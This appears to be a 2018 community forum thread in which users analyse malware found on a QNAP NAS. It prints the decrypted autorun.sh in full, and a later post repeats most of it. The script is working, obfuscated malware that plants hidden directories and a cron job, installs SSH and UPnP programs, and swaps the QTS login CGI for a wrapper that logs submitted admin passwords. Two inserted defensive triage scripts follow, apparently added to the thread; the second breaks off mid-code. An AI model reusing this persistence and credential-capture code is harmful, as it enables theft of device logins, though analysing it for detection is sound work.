Page 2 of 10

Re: Strange folders and cronjobs

Posted: Fri Sep 07, 2018 10:27 pm
by dolbyman
8TB external drives are cheap... should be plenty of space for movies

Re: Strange folders and cronjobs

Posted: Fri Sep 07, 2018 10:32 pm
by benzo83
dolbyman wrote: 8TB external drives are cheap... should be plenty of space for movies

Not too cheap, 300 euro :/

Re: Strange folders and cronjobs

Posted: Fri Sep 07, 2018 10:47 pm
by dolbyman

Re: Strange folders and cronjobs

Posted: Fri Sep 07, 2018 10:50 pm
by Don
benzo83 wrote: Can I safely remove these files? Can any QNAP employee answer me?

No, QNAP employees cannot answer you. This is a community forum and not a QNAP support channel. If you want an answer from QNAP then you need to open a ticket.

Re: Strange folders and cronjobs

Posted: Fri Sep 07, 2018 11:09 pm
by Mousetick
This is a nasty piece of sh.itware you've got there.

I decrypted the autorun.sh (see further below).

I can't spend the time to read and understand what all the script code does; I'm not paid for that, it's QNAP's job, and the tight code gives me a headache. But here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPnP programs

So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gapped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.

Decrypted autorun.sh:

#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
//I;s/\(^\|\
\)\[[^\
]\+\]\
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
bdir=
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
arch_o=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo x86 || echo arm`
upnpbin=$(echo IHu`echo -ne "\\x70\\x73\\x75\\x72"`iSU`echo -ne "\\x66\\x6d\\x6b\\x70"` | tr "SDkYwfvrzzYMiCUcEaImyEaP" "kthefyrfFVeCnDvXyqvfYPzR")
cgi=$(echo a`echo -ne "\\x6a\\x6d"`SVy`echo -ne "\\x62\\x74\\x64\\x76"`pE`echo -ne "\\x6c\\x78\\x65"` | tr "pRymvOeuSRSmMZEeGIMRB" "rj.QhzgEoEd.ALxVmEFsB")
sshbin=$(echo O`echo -ne "\\x72\\x70"`zsu`echo -ne "\\x79\\x63\\x68\\x63"` | tr "xjWHiEYgzocaEyKIBwFS" "MrTFiJGZEPhRIcZnfFhT")
sshhkey=$(echo RrP`echo -ne "\\x6c\\x72\\x76\\x71"`Lc`echo -ne "\\x66\\x6c\\x71"`Rv`echo -ne "\\x6d\\x6b\\x65"` | tr "sVqsTJsNcJPKuLoxugtmPSrv" "InRreWNeZt.pPZAtCdhhcamb")
sshauth=$(echo iN`echo -ne "\\x61\\x6a\\x66"`n`echo -ne "\\x62\\x71"`VCB`echo -ne "\\x70\\x7a\\x69\\x76"` | tr "hauNqrNprUetkKAdZLBafo" "MaPTVgjuDrn.wuzCzeLfox")
sshconf=$(echo QG`echo -ne "\\x6d\\x6c\\x75"`P`echo -ne "\\x76\\x73"` | tr "FixDfMglHsQQJEiRSPLdIxPj" "gCKpGjffRBUUpRSrgDLpAPrH")
archarm=$(echo oS`echo -ne "\\x75\\x6f\\x63"`Ie`echo -ne "\\x66\\x65\\x63"` | tr "gvDHDJFnerSYCWLeEqQXIHY" "lFVogPcyAiqRzTdpoCZBtXn")
archx86=$(echo B`echo -ne "\\x70\\x71"`Tx`echo -ne "\\x69\\x77\\x75"`fP`echo -ne "\\x67\\x79\\x69"` | tr "XlAsnKrbjXXpZbMdCfsrY" "xeNfamiqkSwmmJTyHkPcr")
ipath=$(echo KZ`echo -ne "\\x61\\x73\\x72"`mRQ`echo -ne "\\x69\\x65\\x6b\\x61"` | tr "dkdbaKGBeThGSsJcYKVLwz" ".VwDEtExkUllASJBIkSUnB")
crons=$(echo i`echo -ne "\\x69\\x76"`YzW`echo -ne "\\x73\\x73\\x69\\x72"` | tr "OwnRESmebMGYByfUjprk" "bYGVwvwuIKswzlOxluSY")
arch=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo "$archx86" || echo "$archarm"`
test -f "./${arch}" && sdir=`pwd` || { test "${BASH_SOURCE[0]}" && sdir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) || { test "${0}" && sdir=$( cd "$( dirname "${0}" )" && pwd ); } && test -f "${sdir}/${arch}" && cd "${sdir}"; } || { test -f "/tmp/config/${arch}" && cd /tmp/config; } || {
mdir=$(mktemp -d /tmp/.mount.XXXXXX) || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; }
__BOOT_DEV=
__model=`getcfg System "Internal Model"`
CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; }
command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }; }
for file in "${sshbin}" "${upnpbin}" "."; do test -f "${bdir}/.${ipath}/${file}" || break; done
test "$file" != "." || test ! -f "${bdir}/.${ipath}/${crons}.sh" && { test -s .BOOT_TIME && read -r boottime < .BOOT_TIME || echo `date +%s` > .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME" || echo `date +%s` > "${bdir}/.BOOT_TIME"; test "$boottime" || { read -r boottime < .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME"; }; test "$boottime" && { sleep 2; [ $boottime -gt 0 ] && e=$(( `date +%s` - $boottime )) && [ $e -gt 0 ] && [ $e -lt 1296000 ] && { test "$mdir" && test -e "${mdir}" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }; noex=1; }; }; }
test "$noex" = 1 || {
rm "${bdir}/.BOOT_TIME"
rm .BOOT_TIME
test ! -f "./${arch}" && test -d "${mdir}" && test -f "${mdir}/${arch}" && cd "${mdir}"
tdir=`mktemp -d "${bdir}/.temp.XXXXXX" || mktemp -d "/share/Public/.temp.XXXXXX" || mktemp -d "/mnt/HDA_ROOT/.temp.XXXXXX"`
test -d "$tdir" || { for i in "$bdir" "/share/Public" "/mnt/HDA_ROOT"; do mkdir "${i}/.temp.jbbxQob" > /dev/null 2>&1 && test -d "${i}/.temp.jbbxQob" && tdir="${i}/.temp.jbbxQob"; done;
test -d "$tdir"; } || { tdir=`mktemp -d /tmp/.temp.XXXXXX` && test -d "$tdir"; } || { mkdir "/tmp/.temp.jbbxQob" && tdir=/tmp/.temp.jbbxQob && test -d "$tdir"; } || { tdir=`mktemp -d .XXXXXX` && test -d "$tdir"; } || { mkdir ".jbbxQob" && tdir=".jbbxQob" && test -d "$tdir"; } || tdir=`pwd`
cp "${arch}" ${tdir}
cd ${tdir}
tar -xzf "${arch}"
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }

EOF
test "$fgrep" || fgrep=grep

test -d "${bdir}/.${ipath}" || mkdir -p "${bdir}/.${ipath}" || mkdir "${bdir}/.${ipath}"

test -f "$cgi" && chmod 755 "$cgi" && "./${cgi}"

test -f /tmp/qpkg.conf.bak && { touch -cr /tmp/qpkg.conf.bak "${confdir}/qpkg.conf"; rm /tmp/qpkg.conf.bak; }

cp -p ${crons} "${bdir}/.${ipath}/${crons}.sh" || { cp ${crons} "${bdir}/.${ipath}/${crons}.sh"; touch -cr /bin/busybox "${bdir}/.${ipath}/${crons}.sh"; }

chmod 755 "${bdir}/.${ipath}/${crons}.sh"

if [ -f "${confdir}/crontab" ]; then
test "$RANDOM" || RANDOM=12499
test $(( $RANDOM & 1 )) = 0 && space=' ' || space=''
cronmins="$(( $RANDOM % 4 ))"
test ! "$cronmins" -eq 0 && cronmins="${cronmins}0"
$fgrep "${bdir}/.${ipath}/${crons}.sh" "${confdir}/crontab" >/dev/null 2>&1 || { l=$(( (`wc -l < "${confdir}/crontab"` / 3) + 1)); test "$l" -gt 0 && sed -i "${l}"'i'"$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1' "${confdir}/crontab" || echo "$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1"' >> "${confdir}/crontab" && /etc/init.d/crond.sh restart > /dev/null 2>&1 && touch -cr ${confdir}/apache ${confdir}/crontab; }
fi

for file in "${sshbin}" "${upnpbin}"; do test -f "${bdir}/.${ipath}/${file}" || cp -p "${file}" "${bdir}/.${ipath}/${file}" || { cp "${file}" "${bdir}/.${ipath}/${file}"; touch -cr /bin/busybox "${bdir}/.${ipath}/${file}"; } done
chmod 755 "${bdir}/.${ipath}/${sshbin}"
chmod 755 "${bdir}/.${ipath}/${upnpbin}"

grep 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' /etc/shadow >/dev/null 2>&1 && {
! test -d "${bdir}/.log" && mkdir "${bdir}/.log"
! test -f /home/httpd/cgi-bin/QTSauthLogin.cgi && { cp -p /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi || cp /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi; } && echo '#!/bin/sh
POSTDATA=""
test "x${REQUEST_METHOD}" = xPOST && {
case "${CONTENT_LENGTH}" in '"''"' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '"''"' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat`

test ! -z "$POSTDATA" && case "${POSTDATA}" in *pwd*) test -f "'${bdir}'/.log/.cgi_log" || { test -d "'${bdir}'/.log" || mkdir -p "'${bdir}'/.log" && touch "'${bdir}'/.log/.cgi_log"; } && test $((`stat -c '"'"'%s'"'"' "'${bdir}'/.log/.cgi_log"`)) -lt 209715200 && cat >> "'${bdir}'/.log/.cgi_log" << EOF ;; esac;
$REMOTE_ADDR:$POSTDATA
EOF
}
test ! -z "$POSTDATA" && case "$POSTDATA" in *user=admin* ) true ;; *) false ;; esac || case "$QUERY_STRING" in *user=admin*) true ;; *) false ;; esac && {
case "${REMOTE_ADDR}" in '"''"' | 10.* | 127.* | 192.168.* | 169.254.* | 172.1[6-9].* | 172.2[0-9].* | 172.3[01].* | *:* ) false ;; *) true ;; esac && grep '"'"'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:'"'"' /etc/shadow >/dev/null 2>/dev/null && exit 0
}
if ! test -z "$POSTDATA"; then
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi << V4KLDmYwvc
$POSTDATA
V4KLDmYwvc
else
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi
fi
exit 0' > /home/httpd/cgi-bin/_authLogin.cgi
test "$?" = 0 && test -s /home/httpd/cgi-bin/_authLogin.cgi && test -s /home/httpd/cgi-bin/QTSauthLogin.cgi && mv /home/httpd/cgi-bin/_authLogin.cgi /home/httpd/cgi-bin/authLogin.cgi && chmod 755 /home/httpd/cgi-bin/authLogin.cgi && touch -cr /home/httpd/cgi-bin/QTSauthLogin.cgi /home/httpd/cgi-bin/authLogin.cgi
}

. "${bdir}/.${ipath}/${crons}.sh"
cd "${sdir}"
rm -rf "${tdir}"
test "$mdir" && test -d "$mdir" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }
true;
}


#]
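The traces Mousetick's summary points at (a cron job whose command lives under a hidden directory, the default admin hash in /etc/shadow, authLogin.cgi swapped for a shell wrapper with the original kept as QTSauthLogin.cgi, and the .log/.cgi_log capture file) can all be checked from the NAS's own busybox shell. The script below is an added example written for this page; it is not code from the thread, from the malware or from QNAP. The file locations it checks are the ones named in the decrypted autorun.sh and the hash string is copied from it; the directory tree it builds under mktemp, the hidden path .hiddendir/hook.sh, the client address 203.0.113.5 and the shadow fields are constructed for the demonstration, and the triage function and its FINDING lines are my own.

```sh
#!/bin/sh
# Added triage helper written for this thread; it is not part of the malware,
# of QTS, or of any QNAP tool. It looks for the traces the decrypted autorun.sh
# leaves behind, using only commands a busybox shell provides. make_fixture
# builds a constructed directory tree that stands in for a NAS root; on a real
# box the same checks run with `triage /`.

# Hash the script greps for in /etc/shadow (copied from the posted autorun.sh);
# a match means the admin password was never changed from the default.
DEFAULT_ADMIN_HASH='admin:$1$$CoERg7ynjYLsj2j4glJ34.:'

# Print non-comment crontab lines whose command path contains a hidden
# directory component ("/.name"), the place where the script plants its hook.
hidden_cron_entries() {
    grep -v '^[[:space:]]*#' "$1" 2>/dev/null |
        grep -E '(^|[[:space:]])/[^[:space:]]*/\.[^/.[:space:]]'
}

# True when the shadow file still carries the default admin hash.
admin_has_default_password() {
    grep -F -q "$DEFAULT_ADMIN_HASH" "$1" 2>/dev/null
}

# The script keeps the real login CGI as QTSauthLogin.cgi and installs a shell
# wrapper as authLogin.cgi; a backup by that name, or a shebang where a native
# binary belongs, is the tell.
login_cgi_tampered() {
    [ -e "$1/QTSauthLogin.cgi" ] && return 0
    [ -f "$1/authLogin.cgi" ] && head -n 1 "$1/authLogin.cgi" | grep -q '^#!' && return 0
    return 1
}

# The wrapper appends "<remote address>:<POST body>" to <share>/.log/.cgi_log.
captured_credentials_present() {
    [ -s "$1/.log/.cgi_log" ]
}

# Run every check against a NAS root, print one line per finding and return
# the number of findings, so 0 means nothing was spotted.
triage() {
    n=0
    if [ -n "$(hidden_cron_entries "$1/etc/config/crontab")" ]; then
        echo "FINDING: cron job runs from a hidden directory"; n=$((n + 1)); fi
    if admin_has_default_password "$1/etc/shadow"; then
        echo "FINDING: admin account still has the default password"; n=$((n + 1)); fi
    if login_cgi_tampered "$1/home/httpd/cgi-bin"; then
        echo "FINDING: authLogin.cgi has been replaced by a wrapper"; n=$((n + 1)); fi
    for share in "$1"/share/*; do
        if captured_credentials_present "$share"; then
            echo "FINDING: captured-credentials log at $share/.log/.cgi_log"; n=$((n + 1)); fi
    done
    return $n
}

# Build a constructed NAS tree under mktemp: "infected" carries every indicator
# (hidden path, client address and shadow fields are made up), "clean" carries none.
make_fixture() {
    root=$(mktemp -d) || return 1
    cgi="$root/home/httpd/cgi-bin"
    mkdir -p "$root/etc/config" "$cgi" "$root/share/CACHEDEV1_DATA"
    printf '%s\n' '# constructed crontab' '0 3 * * * /etc/init.d/backup.sh' > "$root/etc/config/crontab"
    if [ "$1" = infected ]; then
        echo '30 * * * * /share/CACHEDEV1_DATA/.hiddendir/hook.sh >/dev/null 2>&1' >> "$root/etc/config/crontab"
        printf '%s17000:0:99999:7:::\n' "$DEFAULT_ADMIN_HASH" > "$root/etc/shadow"
        printf '#!/bin/sh\nexec -a "$0" /home/httpd/cgi-bin/QTSauthLogin.cgi\n' > "$cgi/authLogin.cgi"
        printf '\177ELF' > "$cgi/QTSauthLogin.cgi"
        mkdir -p "$root/share/CACHEDEV1_DATA/.log"
        echo '203.0.113.5:user=admin&pwd=<constructed>' > "$root/share/CACHEDEV1_DATA/.log/.cgi_log"
    else
        printf 'admin:$1$made.up$notTheDefaultHash:17000:0:99999:7:::\n' > "$root/etc/shadow"
        printf '\177ELF' > "$cgi/authLogin.cgi"
    fi
    echo "$root"
}

# Demo against the constructed infected tree; triage's exit status is the count.
demo_root=$(make_fixture infected)
triage "$demo_root" || :
rm -rf "$demo_root"
```

Run with no arguments to see the demo against the constructed tree; on a live box, `triage /` applies the same four checks to the real /etc/config/crontab, /etc/shadow, /home/httpd/cgi-bin and every /share/* volume. The hidden-directory cron check is deliberately broad and may flag legitimate QNAP entries that live under dot-directories, so treat each hit as something to inspect rather than as proof by itself; the QTSauthLogin.cgi backup and a shebang at the top of authLogin.cgi are the stronger signals.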

Re: Strange folders and cronjobs

Posted: Fri Sep 07, 2018 11:50 pm
by benzo83
Mousetick wrote: This is a nasty piece of sh.itware you've got there.

I decrypted the autorun.sh (see further below).

I can't spend the time to read and understand what all the script code does; I'm not paid for that, it's QNAP's job, and the tight code gives me a headache. But here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPnP programs

So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gapped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.


Thank you.
The router is an ISP router, the NAS is a QNAP NAS, all software is up to date, and the malware vehicle is one of the NAS services. I exposed the NAS to the network with 2FA, a strong password, etc., but it was not enough.

Re: Strange folders and cronjobs

Posted: Sat Sep 08, 2018 1:08 am
by somy1982
benzo83 wrote:
dolbyman wrote: 8TB external drives are cheap... should be plenty of space for movies

Not too cheap, 300 euro :/

Do you have Music Station installed and enabled?
QNAP support suspects it is caused by a vulnerability in Music Station and suggested turning it off for now.

Re: Strange folders and cronjobs

Posted: Sat Sep 08, 2018 1:10 am
by somy1982
Mousetick wrote: This is a nasty piece of sh.itware you've got there.

I decrypted the autorun.sh (see further below).

I can't spend the time to read and understand what all the script code does; I'm not paid for that, it's QNAP's job, and the tight code gives me a headache. But here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPnP programs

So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gapped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.


chmod 755 "${bdir}/.${ipath}/${crons}.sh"

if [ -f "${confdir}/crontab" ]; then
test "$RANDOM" || RANDOM=12499
test $(( $RANDOM & 1 )) = 0 && space=' ' || space=''
cronmins="$(( $RANDOM % 4 ))"
test ! "$cronmins" -eq 0 && cronmins="${cronmins}0"
$fgrep "${bdir}/.${ipath}/${crons}.sh" "${confdir}/crontab" >/dev/null 2>&1 || { l=$(( (`wc -l < "${confdir}/crontab"` / 3) + 1)); test "$l" -gt 0 && sed -i "${l}"'i'"$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1' "${confdir}/crontab" || echo "$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1"' >> "${confdir}/crontab" && /etc/init.d/crond.sh restart > /dev/null 2>&1 && touch -cr ${confdir}/apache ${confdir}/crontab; }
fi

for file in "${sshbin}" "${upnpbin}"; do test -f "${bdir}/.${ipath}/${file}" || cp -p "${file}" "${bdir}/.${ipath}/${file}" || { cp "${file}" "${bdir}/.${ipath}/${file}"; touch -cr /bin/busybox "${bdir}/.${ipath}/${file}"; } done
chmod 755 "${bdir}/.${ipath}/${sshbin}"
chmod 755 "${bdir}/.${ipath}/${upnpbin}"

grep 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' /etc/shadow >/dev/null 2>&1 && {
! test -d "${bdir}/.log" && mkdir "${bdir}/.log"
! test -f /home/httpd/cgi-bin/QTSauthLogin.cgi && { cp -p /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi || cp /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi; } && echo '#!/bin/sh
POSTDATA=""
test "x${REQUEST_METHOD}" = xPOST && {
case "${CONTENT_LENGTH}" in '"''"' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '"''"' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat`

test ! -z "$POSTDATA" && case "${POSTDATA}" in *pwd*) test -f "'${bdir}'/.log/.cgi_log" || { test -d "'${bdir}'/.log" || mkdir -p "'${bdir}'/.log" && touch "'${bdir}'/.log/.cgi_log"; } && test $((`stat -c '"'"'%s'"'"' "'${bdir}'/.log/.cgi_log"`)) -lt 209715200 && cat >> "'${bdir}'/.log/.cgi_log" << EOF ;; esac;
$REMOTE_ADDR:$POSTDATA
EOF
}
test ! -z "$POSTDATA" && case "$POSTDATA" in *user=admin* ) true ;; *) false ;; esac || case "$QUERY_STRING" in *user=admin*) true ;; *) false ;; esac && {
case "${REMOTE_ADDR}" in '"''"' | 10.* | 127.* | 192.168.* | 169.254.* | 172.1[6-9].* | 172.2[0-9].* | 172.3[01].* | *:* ) false ;; *) true ;; esac && grep '"'"'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:'"'"' /etc/shadow >/dev/null 2>/dev/null && exit 0
}
if ! test -z "$POSTDATA"; then
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi << V4KLDmYwvc
$POSTDATA
V4KLDmYwvc
else
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi
fi
exit 0' > /home/httpd/cgi-bin/_authLogin.cgi
test "$?" = 0 && test -s /home/httpd/cgi-bin/_authLogin.cgi && test -s /home/httpd/cgi-bin/QTSauthLogin.cgi && mv /home/httpd/cgi-bin/_authLogin.cgi /home/httpd/cgi-bin/authLogin.cgi && chmod 755 /home/httpd/cgi-bin/authLogin.cgi && touch -cr /home/httpd/cgi-bin/QTSauthLogin.cgi /home/httpd/cgi-bin/authLogin.cgi
}

. "${bdir}/.${ipath}/${crons}.sh"
cd "${sdir}"
rm -rf "${tdir}"
test "$mdir" && test -d "$mdir" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }
true;
}


#]
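The decoded script above leaves a handful of things on disk that can be checked for directly: a crontab line whose command lives under a hidden directory, the genuine authLogin.cgi preserved as QTSauthLogin.cgi next to a shell-script replacement, the ${bdir}/.log/.cgi_log capture file, and the literal admin hash it compares /etc/shadow against. The indicator scan below is an added example written for this thread, not code from the post or from QNAP. It assumes the QTS configuration directory (${confdir} in the script) is /etc/config, treats QTS's own .qpkg directory as the one hidden directory that legitimately hosts scheduled commands, and uses a placeholder ${bdir} of /share/CACHEDEV1_DATA together with constructed sample trees (the .SDa3Z/xQw2.sh names, the 203.0.113.7 address and the placeholder shadow line are made up) so that it runs offline.

```shell
#!/bin/sh
# Indicator scan for the persistence and credential-theft pieces of the
# decoded autorun.sh (added example; assumptions are marked below).
# Every function takes an explicit root so it can be run against the live
# NAS ("/") or a copied filesystem; the sample trees are constructed.

# 1. Cron persistence. The script inserts
#    "<mins> * * * * ${bdir}/.${ipath}/${crons}.sh >/dev/null 2>&1"
#    into the crontab, i.e. a command under a dot-prefixed directory.
#    Assumption: QTS's own .qpkg app directory is the only hidden directory
#    that legitimately hosts scheduled commands, so that name is excluded.
suspicious_cron_lines() {
    crontab="$1"
    [ -f "$crontab" ] || return 0
    awk '
        /^[ \t]*#/ || /^[ \t]*$/ { next }       # comments and blank lines
        {
            n = split($6, comp, "/")             # $6 = command after the 5 schedule fields
            for (i = 1; i <= n; i++)
                if (comp[i] ~ /^\./ && comp[i] != ".qpkg") { print; break }
        }' "$crontab"
}

# 2. Login hook. The genuine binary is kept as QTSauthLogin.cgi and
#    authLogin.cgi becomes a shell wrapper; either artefact is an indicator.
cgi_login_hooked() {
    cgidir="$1"
    [ -f "$cgidir/QTSauthLogin.cgi" ] && return 0
    if [ -f "$cgidir/authLogin.cgi" ]; then
        head -c 2 "$cgidir/authLogin.cgi" | grep -q '#!' && return 0
    fi
    return 1
}

# 3. Harvested logins are appended to ${bdir}/.log/.cgi_log as "<ip>:<postdata>".
credential_log_present() { [ -f "$1/.log/.cgi_log" ]; }

# 4. The hook is only installed while /etc/shadow carries the literal hash
#    the script treats as the factory-default admin password.
admin_password_is_default() {
    grep -q 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' "$1"
}

# Run all checks; findings go to stderr, the count to stdout.
# Assumption: ${confdir} is /etc/config, the QTS configuration directory.
scan_nas() {
    root="$1"; bdir="$2"; findings=0
    hits=$(suspicious_cron_lines "$root/etc/config/crontab")
    if [ -n "$hits" ]; then
        printf 'cron entries under hidden directories:\n%s\n' "$hits" >&2
        findings=$((findings + 1))
    fi
    if cgi_login_hooked "$root/home/httpd/cgi-bin"; then
        echo "authLogin.cgi is wrapped (QTSauthLogin.cgi backup or script shebang)" >&2
        findings=$((findings + 1))
    fi
    if credential_log_present "$bdir"; then
        echo "credential capture log $bdir/.log/.cgi_log exists" >&2
        findings=$((findings + 1))
    fi
    if admin_password_is_default "$root/etc/shadow"; then
        echo "admin password is still the factory default" >&2
        findings=$((findings + 1))
    fi
    echo "$findings"
}

# Constructed sample tree (clean or infected); nothing here is real NAS data.
# The hidden .SDa3Z/xQw2.sh path, the shadow lines and 203.0.113.7 are placeholders.
build_sample_tree() {
    dest="$1"; state="$2"
    mkdir -p "$dest/etc/config" "$dest/home/httpd/cgi-bin" "$dest/share/CACHEDEV1_DATA"
    cat > "$dest/etc/config/crontab" <<'EOF'
# m h dom mon dow cmd
*/5 * * * * /mnt/ext/opt/apache/bin/php /mnt/ext/opt/qdesk/www/public/index.php cli watchdog woof
0 3 * * * /share/CACHEDEV1_DATA/.qpkg/HybridBackup/hbs.sh start
EOF
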